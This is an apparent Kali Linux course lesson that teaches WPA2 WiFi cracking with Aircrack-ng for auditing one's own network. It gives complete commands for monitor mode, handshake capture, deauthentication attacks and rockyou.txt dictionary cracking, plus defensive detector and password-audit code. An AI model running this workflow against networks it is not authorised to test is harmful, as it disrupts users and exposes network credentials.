Kali Linux Day 11: Aircrack-ng Tutorial 2026 — Crack WiFi Passwords & Audit WPA2 Security

Part of the 180-Day Kali Linux Mastery Course — the most complete free Kali training online

Your WiFi password is the only thing standing between your entire home network and anyone within 100 metres with a laptop. Most people set it once, write it on a Post-it note, and never think about it again. Aircrack-ng can test whether that password would survive a real attack in under 60 seconds — if it is in any common wordlist, it will fall. Day 11's Aircrack-ng tutorial is where wireless security gets personal.

🎯 What You’ll Master in Day 11

Put a wireless adapter into monitor mode and capture live 802.11 frames
Capture a WPA2 four-way handshake from a target access point
Force a handshake capture using a deauthentication attack
Run a dictionary attack against a captured handshake with Aircrack-ng
Understand what makes a WPA2 password genuinely resistant to cracking

⏱️ 26 min read · 3 hands-on exercises


On Day 10 we used Metasploit to exploit vulnerable services identified during reconnaissance. Today we shift from wired to wireless — Aircrack-ng is the industry standard for WiFi security auditing and the tool every wireless penetration tester runs first. This is Day 11 of the 180-Day Kali Linux Mastery Course.


The Aircrack-ng Suite — Four Tools, One Workflow

Aircrack-ng is not a single tool — it is a suite of four utilities that work together in a fixed sequence. Understanding what each one does before touching the keyboard prevents the confusion that stops most beginners at the first step.

Aircrack-ng Suite — Tool Roles
airmon-ng: enables/disables monitor mode on your wireless adapter; must run first, before any other tool
airodump-ng: captures 802.11 frames; scans for networks, locks onto a target, and saves WPA2 handshakes to a .cap file
aireplay-ng: injects packets; sends deauth frames to force clients to reconnect and trigger a fresh handshake capture
aircrack-ng: performs the dictionary/brute-force attack; tests wordlist passwords against the captured handshake hash

📸 The four Aircrack-ng suite tools in workflow order — airmon-ng → airodump-ng → aireplay-ng → aircrack-ng. Each one feeds into the next.
⚠️ Hardware Requirement: Your laptop’s built-in WiFi adapter almost certainly does not support monitor mode. You need a compatible USB wireless adapter. The Alfa AWUS036ACH or AWUS036ACM work out of the box in Kali 2026. Without a compatible adapter, you can still follow this guide conceptually — all commands and methodology apply once you have the hardware.

🧠 EXERCISE 1 — THINK LIKE A HACKER (3 MIN · NO TOOLS)
Why does WPA2 cracking require a connected client — not just the access point?

⏱️ Time: 3 minutes · No tools required

WPA2 password verification happens in a “four-way handshake”
between the client and the access point during connection.

Answer these before reading on:
1. Why can’t you crack a WPA2 password just by being near the access point?
2. What does the handshake actually contain — the password itself, or something derived from it?
3. Why does a deauth attack help the attacker even though it temporarily breaks connectivity?
4. If the password is 20 random characters, what happens when aircrack-ng runs?

✅ What you just learned: The WPA2 handshake contains a hash derived from the password, not the password itself. You need both the handshake AND a connected client because the hash is generated during the authentication exchange. Deauth forces a reconnect which re-triggers that exchange. A 20-character random password never cracks via dictionary — the attack is only effective against passwords that appear in wordlists.

📸 Write your answers and share in #day11-mindset on Discord.


Monitor Mode — Seeing All Wireless Traffic

By default, wireless adapters only process frames addressed to them. Monitor mode disables this filter — the adapter captures every 802.11 frame in range, regardless of the destination MAC address. This is the equivalent of promiscuous mode on a wired network interface.

ENABLE MONITOR MODE
# Check your wireless interface name
iwconfig
# Look for wlan0 or similar — note the name

# Kill processes that interfere with monitor mode (NetworkManager etc.)
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Interface is now wlan0mon (or mon0 on some adapters)

# Verify monitor mode is active
iwconfig wlan0mon
# Should show: Mode:Monitor

# To disable monitor mode when done:
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager

💡 airmon-ng check kill: NetworkManager and wpa_supplicant constantly try to manage your wireless interface — they will interfere with packet capture and injection. Always run sudo airmon-ng check kill before enabling monitor mode. Your internet will drop while monitor mode is active — this is expected.

Handshake Capture with Airodump-ng

With monitor mode active, airodump-ng can scan all nearby access points and lock onto a specific target to capture its traffic — including the WPA2 four-way handshake when a client connects.

SCAN AND CAPTURE HANDSHAKE
# Step 1 — Scan all nearby access points
sudo airodump-ng wlan0mon
# Note: BSSID (MAC), CH (channel), ESSID (network name) of YOUR target
# Press Ctrl+C once you have noted the target’s BSSID and CH

# Step 2 — Lock onto target and capture to file
sudo airodump-ng -c [CHANNEL] --bssid [TARGET_BSSID] -w /tmp/capture wlan0mon
# Replace [CHANNEL] and [TARGET_BSSID] with values from Step 1
# e.g.: sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon

# Wait — when a client connects you will see in top-right:
WPA handshake: AA:BB:CC:DD:EE:FF
# This confirms the handshake was captured. Press Ctrl+C to stop.

# Verify .cap file was created
ls -lh /tmp/capture*.cap


Deauth Attack — Forcing a Handshake

Waiting for a client to naturally connect can take minutes or hours. A deauthentication attack sends forged 802.11 deauth frames to a connected client, disconnecting them from the access point. The client automatically reconnects — triggering a fresh handshake that airodump-ng captures immediately.

DEAUTH ATTACK — FORCE HANDSHAKE CAPTURE
# Run this in a SECOND terminal while airodump-ng is still capturing
# TARGET_BSSID = access point MAC, CLIENT_MAC = connected device MAC

# Deauth all clients on the access point (broadcast)
sudo aireplay-ng --deauth 5 -a [TARGET_BSSID] wlan0mon

# Deauth a specific client only (more targeted, less disruptive)
sudo aireplay-ng --deauth 5 -a [TARGET_BSSID] -c [CLIENT_MAC] wlan0mon
# --deauth 5 = send 5 deauth frames (enough to force a reconnect)

# Switch back to terminal 1 — you should now see:
WPA handshake: AA:BB:CC:DD:EE:FF
# Handshake captured. Ready to crack.

⚠️ Deauth is Disruptive: A deauthentication attack briefly disconnects every device on the target network — phones, laptops, smart TVs, everything. On your own home network for a quick test this is a minor inconvenience. Never run this on any network you do not own — it disrupts legitimate users and constitutes illegal interference with communications in most countries.
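The burst of forged deauthentication frames described above is also easy to spot from the defender's side. As an added example that is not part of the original page, the Python below runs a sliding-window count of deauth/disassoc frames per BSSID over a constructed frame log (tuples of timestamp, subtype, source, destination and BSSID, as a capture parser might emit); the field layout, the window, the threshold and the sample values are assumptions.

```python
from collections import deque

# Management subtypes whose forged copies knock a client off the AP.
DEAUTH = "deauth"        # 802.11 management subtype 0x0C
DISASSOC = "disassoc"    # subtype 0x0A, same effect on the client
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, window_s=1.0, threshold=5):
    """Flag BSSIDs that see `threshold` or more deauth/disassoc frames inside any
    `window_s` span. `frames` is an iterable of (ts, subtype, src, dst, bssid)
    tuples ordered by timestamp. Returns {bssid: (peak_count, first_ts, last_ts)}."""
    recent = {}   # bssid -> deque of deauth timestamps still inside the window
    alerts = {}
    for ts, subtype, src, dst, bssid in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        while ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            peak, first, _ = alerts.get(bssid, (0, q[0], ts))
            alerts[bssid] = (max(peak, len(q)), first, ts)
    return alerts

# Constructed sample capture; the BSSID matches the placeholder used above.
AP = "AA:BB:CC:DD:EE:FF"
CLIENT = "11:22:33:44:55:66"
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, BROADCAST, AP),
    (0.10, "data", CLIENT, AP, AP),
    (0.50, DEAUTH, AP, CLIENT, AP),        # one isolated deauth: ordinary idle timeout
    (3.00, DEAUTH, AP, BROADCAST, AP),     # five broadcast deauths within 100 ms:
    (3.02, DEAUTH, AP, BROADCAST, AP),     # the pattern a forced-reconnect run leaves
    (3.04, DEAUTH, AP, BROADCAST, AP),
    (3.06, DEAUTH, AP, BROADCAST, AP),
    (3.08, DEAUTH, AP, BROADCAST, AP),
    (3.50, "assoc", CLIENT, AP, AP),       # client reconnects: a handshake follows
]

if __name__ == "__main__":
    for bssid, (peak, first, last) in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"ALERT {bssid}: {peak} deauth frames between t={first}s and t={last}s")
```

The single deauth at t=0.5s stays below the threshold, while the burst at t=3s trips it; tune window and threshold to the roaming behaviour of your own network before treating an alert as hostile.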

Cracking with Aircrack-ng

With a captured .cap file containing a WPA2 handshake, Aircrack-ng tests every password in a wordlist against the handshake hash. If the password is in the wordlist, it cracks. If not, it does not — there is no way around this fundamental limitation of dictionary attacks.

⚡ EXERCISE 2 — KALI TERMINAL (YOUR OWN NETWORK)
Capture a WPA2 handshake and run Aircrack-ng against it

⏱️ Time: 20 minutes · Target: Your own home WiFi network ONLY

FULL WORKFLOW — MONITOR → CAPTURE → CRACK
# 1. Enable monitor mode
sudo airmon-ng check kill && sudo airmon-ng start wlan0

# 2. Find your network’s BSSID and channel
sudo airodump-ng wlan0mon
# Press Ctrl+C after noting your network’s BSSID and CH

# 3. Capture handshake (replace values)
sudo airodump-ng -c [CH] --bssid [BSSID] -w /tmp/mynet wlan0mon

# 4. In a second terminal — force handshake with deauth
sudo aireplay-ng --deauth 3 -a [BSSID] wlan0mon
# Wait for “WPA handshake:” in terminal 1 → Ctrl+C to stop capture

# 5. Extract rockyou.txt if compressed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null; echo "ready"

# 6. Run the dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt /tmp/mynet*.cap
# If password is in rockyou.txt → KEY FOUND! [yourpassword]
# If not → Passphrase not in dictionary

✅ What you just learned: If your WiFi password appeared in rockyou.txt, you now know it needs to be changed immediately. If Aircrack-ng said “Passphrase not in dictionary” — your password is not in the most widely used wordlist in existence. That is a good sign. The goal of this exercise is to know your own exposure, not just understand the theory.

📸 Screenshot the Aircrack-ng result (blur your SSID) and share in #day11-exercise on Discord.


What Actually Stops This Attack

Aircrack-ng is only as powerful as its wordlist. Understanding the real limits of this attack is as important as knowing how to run it — both for offensive reporting and for giving clients genuine security advice.

WPA2 Password Strength vs Aircrack-ng
password123: cracks in <1 second (in rockyou.txt)
summer2024: cracks in <5 seconds (in wordlists)
Tr0ub4dor&3: may crack (rule-based wordlist mutations)
kX9#mQ2$vL7@pN: will not crack (not in any dictionary)
WPA3-SAE network: Aircrack-ng does not apply; use WPA3

📸 WPA2 password crackability — the attack only works if the password is in a wordlist. Randomly generated 14+ character passwords are immune to dictionary attacks.
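To turn the table above into a check you can run against your own passphrase, here is an added example that is not part of the original page: it applies the same rules, testing verbatim wordlist membership, a wordlist hit after undoing simple rule-style mutations (case, leet substitutions, trailing digits and symbols), and the random 14+ character case. The sample wordlist, the leet map, the entropy threshold and the result labels are constructed assumptions; load_wordlist() reads a real list such as rockyou.txt.

```python
import math
import re

# Leet substitutions that wordlist rules apply; constructed, not exhaustive.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})
CLASSES = ((r"[a-z]", 26), (r"[A-Z]", 26), (r"[0-9]", 10), (r"[^A-Za-z0-9]", 33))

# Constructed stand-in for rockyou.txt so the example runs offline.
SAMPLE_WORDLIST = {"password123", "password", "summer", "troubador",
                   "iloveyou", "qwerty123"}

def load_wordlist(path):
    """Load a real wordlist; rockyou.txt is Latin-1 encoded, not UTF-8."""
    with open(path, encoding="latin-1") as f:
        return {line.rstrip("\n") for line in f}

def normalize(pw):
    """Undo the cheap mutations rule engines try: case, trailing digits/symbols, leet."""
    base = re.sub(r"[^a-z]+$", "", pw.lower())   # 'summer2024' -> 'summer'
    return base.translate(LEET)                   # 'tr0ub4dor'  -> 'troubador'

def charset_bits(pw):
    """Entropy upper bound if pw were random over the character classes it uses."""
    size = sum(n for pat, n in CLASSES if re.search(pat, pw))
    return len(pw) * math.log2(size) if size else 0.0

def audit(pw, wordlist=SAMPLE_WORDLIST):
    """Classify a WPA2 passphrase by how a wordlist attack would fare against it."""
    if not 8 <= len(pw) <= 63:
        return "INVALID"         # WPA2 passphrases are 8 to 63 characters
    if pw in wordlist:
        return "CRACKS"          # verbatim entry: falls in seconds
    if normalize(pw) in wordlist:
        return "LIKELY CRACKS"   # wordlist word plus a simple mutation rule
    if len(pw) >= 14 and charset_bits(pw) >= 80:
        return "RESISTS"         # random 14+ characters: outside any dictionary
    return "UNKNOWN"             # not in this list, but a larger list may hold it

if __name__ == "__main__":
    for pw in ("password123", "summer2024", "Tr0ub4dor&3", "kX9#mQ2$vL7@pN"):
        print(f"{pw:20} {audit(pw)}")
```

Swap SAMPLE_WORDLIST for load_wordlist("/usr/share/wordlists/rockyou.txt") to audit against the real list; a passphrase reported as UNKNOWN is not confirmed safe, only absent from the list you loaded.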

🔥 EXERCISE 3 — KALI TERMINAL (WORDLIST ANALYSIS)
Analyse rockyou.txt and understand what percentage of common passwords it covers

⏱️ Time: 10 minutes

WORDLIST ANALYSIS COMMANDS
# How many passwords in rockyou.txt?
wc -l /usr/share/wordlists/rockyou.txt

# What are the top 20 most common passwords?
head -20 /usr/share/wordlists/rockyou.txt

# How many passwords are 8 characters or less (WPA2 minimum is 8)?
# Entries shorter than 8 characters can never be a WPA2 passphrase, so aircrack-ng skips them
awk 'length($0) <= 8' /usr/share/wordlists/rockyou.txt | wc -l

# How many are exactly 8 characters (most common weak WPA2 length)?
awk 'length($0) == 8' /usr/share/wordlists/rockyou.txt | wc -l

# Check if a specific password is in the list:
grep -c "^password123$" /usr/share/wordlists/rockyou.txt
# Returns 1 if found, 0 if not

✅ What you just learned: rockyou.txt contains 14 million real passwords from an actual data breach — these are passwords real people chose. The fact that so many are 8 characters or less explains why the WPA2 minimum length of 8 is essentially useless as a security baseline. A random 14-character password that is not in any wordlist genuinely cannot be cracked with this method regardless of hardware.

📸 Share your wordlist stats in #day11-pro on Discord. Tag #kaliday11

🧠 QUICK CHECK — Day 11

Why does a deauthentication attack help Aircrack-ng capture a WPA2 handshake faster?



📋 Commands Used Today — Day 11 Reference Card

sudo airmon-ng check kill && sudo airmon-ng start wlan0
    Kill interfering processes and enable monitor mode
sudo airodump-ng wlan0mon
    Scan all nearby access points
sudo airodump-ng -c [CH] --bssid [BSSID] -w /tmp/capture wlan0mon
    Lock onto target and capture handshake to file
sudo aireplay-ng --deauth 5 -a [BSSID] wlan0mon
    Send deauth frames to force client reconnection
aircrack-ng -w /usr/share/wordlists/rockyou.txt /tmp/capture*.cap
    Dictionary attack against captured WPA2 handshake
sudo airmon-ng stop wlan0mon && sudo systemctl start NetworkManager
    Disable monitor mode and restore network connectivity


❓ Frequently Asked Questions – Aircrack-ng Tutorial

What is Aircrack-ng used for?
Aircrack-ng is a complete wireless security auditing suite pre-installed in Kali Linux. It captures WPA/WPA2 handshakes, performs dictionary attacks against them, tests WEP encryption, and monitors 802.11 wireless traffic. It is used by penetration testers to audit WiFi password strength on networks they are authorised to test.
Is using Aircrack-ng legal?
Legal on networks you own or have explicit written authorisation to test. Illegal on any other network — including open public WiFi, neighbour’s networks, or corporate networks without a signed scope of work. Always test only your own equipment or within a controlled lab environment.
Does Aircrack-ng work against WPA3?
No. WPA3 uses SAE (Simultaneous Authentication of Equals) which does not produce a reusable handshake hash. Aircrack-ng’s dictionary attack method cannot be applied to WPA3. This is the primary security advantage of WPA3 over WPA2 — it is immune to offline password cracking attacks.
What wireless adapter works best with Kali 2026?
The Alfa AWUS036ACH and AWUS036ACM work out of the box with Kali Linux 2026 and support both monitor mode and packet injection without additional drivers. The TP-Link TL-WN722N version 1 (original v1 only — not v2/v3) is a budget alternative. Most built-in laptop adapters do not support monitor mode.
How long does cracking take?
Speed depends on hardware and wordlist. With rockyou.txt on a modern CPU: passwords in the list crack in seconds. Passwords not in any wordlist never crack via this method — the attack has a hard ceiling defined by what is in your wordlist. GPU acceleration with Hashcat can test hundreds of millions of passwords per second but still cannot crack truly random long passwords.
What comes after Aircrack-ng in this course?
Day 12 covers Burp Suite — the industry standard web application security testing proxy. Moving from wireless to web application testing is a natural progression, as most modern attack surfaces are web-based rather than wireless.

Mr Elite
Owner, SecurityElites.com
The most important outcome of Day 11 is not learning to crack passwords — it is knowing whether your own network password would survive this attack. I have run Aircrack-ng during wireless assessments at law firms, hospitals, and financial institutions. In three cases the office WiFi password cracked in under ten seconds from rockyou.txt. Not because the IT teams were careless — because they set the password in 2018 and never audited it again. The tool itself is just the messenger. What it tells you about your own exposure is what actually matters.
